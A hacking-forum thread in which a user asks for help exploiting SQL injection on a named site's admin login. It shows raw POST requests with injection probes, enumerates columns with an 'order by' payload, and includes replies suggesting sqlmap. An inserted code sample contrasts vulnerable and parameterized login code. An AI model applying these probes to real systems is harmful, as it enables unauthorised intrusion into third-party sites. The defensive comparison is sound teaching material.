Help with SQL injection

man474019 (Member, 27.06.2018)

Hi all
please help to exploit sqli
POST /adminiztrator.php HTTP/1.1
Host: escortahmedabad.info
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
Content-Type: multipart/form-data; boundary=---------------------------2276829840405
Content-Length: 359
Cookie: PHPSESSID=1nold7pifrllhsa5gpjtkoqtg6
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------2276829840405
Content-Disposition: form-data; name="action"

login
-----------------------------2276829840405
Content-Disposition: form-data; name="login"

admin'
-----------------------------2276829840405
Content-Disposition: form-data; name="password"

a
-----------------------------2276829840405--
response is
[screenshot of the response]

I checked for an exploit with an error-based vector, but could not

and when doing
POST /adminiztrator.php HTTP/1.1
Host: escortahmedabad.info
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
Content-Type: multipart/form-data; boundary=---------------------------2276829840405
Content-Length: 356
Cookie: PHPSESSID=1nold7pifrllhsa5gpjtkoqtg6
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------2276829840405
Content-Disposition: form-data; name="action"

login
-----------------------------2276829840405
Content-Disposition: form-data; name="login"

a' order by 11-- -
-----------------------------2276829840405
Content-Disposition: form-data; name="password"

a
-----------------------------2276829840405--
response is Unknown column '11' in 'order clause'
there are 10 columns
but I don't know how to exploit then
Thanks!
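
The behaviour reported in the post above (a quote in the `login` field producing a database error that is shown to the client) is what string-built SQL plus echoed driver errors looks like. The following is an added example, not code from this thread or from the site: it puts that pattern beside the parameterized fix, using Python's sqlite3 and a constructed `users` table as a stand-in, so the function names, schema and error text are assumptions.

```python
import hashlib, hmac, os, sqlite3

GENERIC = "Invalid login or password"   # the only failure text a client should see

def _hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def make_db():
    # Constructed sample data: one in-memory account standing in for the real table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (login TEXT PRIMARY KEY, salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    db.execute("INSERT INTO users VALUES (?, ?, ?)",
               ("admin", salt, _hash("correct horse", salt)))
    return db

def _check(row, password):
    ok = row is not None and hmac.compare_digest(row[1], _hash(password, row[0]))
    return ok, "" if ok else GENERIC

def login_vulnerable(db, login, password):
    # BEFORE: the form field is pasted into the SQL text, so a quote in it
    # rewrites the statement, and the raw driver error goes back to the client.
    sql = "SELECT salt, pw_hash FROM users WHERE login = '" + login + "'"
    try:
        return _check(db.execute(sql).fetchone(), password)
    except sqlite3.Error as exc:
        return False, str(exc)           # leaks query structure to the caller

def login_hardened(db, login, password):
    # AFTER: the value is bound as a parameter and can never become SQL syntax;
    # any database failure is reported with the same generic message.
    try:
        row = db.execute("SELECT salt, pw_hash FROM users WHERE login = ?",
                         (login,)).fetchone()
        return _check(row, password)
    except sqlite3.Error:
        return False, GENERIC            # details belong in the server log only

# The two `login` field values from the requests in the post above.
PROBES = ["admin'", "a' order by 11-- -"]

if __name__ == "__main__":
    db = make_db()
    for probe in PROBES:
        print(repr(probe), login_vulnerable(db, probe, "a"), login_hardened(db, probe, "a"))
```

With the hardened handler both values are treated as ordinary, non-matching login names, and the response is identical to any other failed login.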
 
5h3ll (Mod. Ethical Hacking, Red Team, 23.01.2018)

Have you tried sqlmap with a POST request?
 
man474019 (Member, 27.06.2018)

Yes bro, I tried, and with the level and risk parameters also, but no result.
 
Tsunami (Active member, 04.05.2018)

I think this is the trick of the creator of the site.
However, please remove the site name from the sample requests.
(this is not ethical in relation to the site owner)
 